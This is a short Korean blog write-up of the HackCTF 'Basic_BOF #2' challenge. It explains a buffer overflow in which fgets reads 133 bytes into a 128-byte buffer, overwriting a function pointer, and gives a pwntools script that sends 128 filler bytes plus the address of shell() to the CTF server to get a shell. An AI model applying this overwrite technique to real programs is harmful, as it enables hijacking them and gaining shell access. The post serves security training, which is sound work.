시스템 해킹/HackCTF
HackCTF - Basic_BOF #2
ii4gsp
2020. 2. 8. 19:50
파일을 다운받아 주자.
IDA로 열어보면 s는 128만큼 할당받았다.
fgets()함수에서는 133byte만큼 입력받는다.
v5는 sup()함수를 가리키고있다.
128byte를 주고 shell()함수의 주소를 전달하면 쉘을 획득한다.
shell()함수의 주소는 0x0804849B이다.
from pwn import *
r = remote("ctf.j0n9hyun.xyz", 3001)
payload = ''
payload += '\x90' * 128
payload += p32(0x0804849B)
r.sendline(payload)
r.interactive()
소스코드를 작성해주자.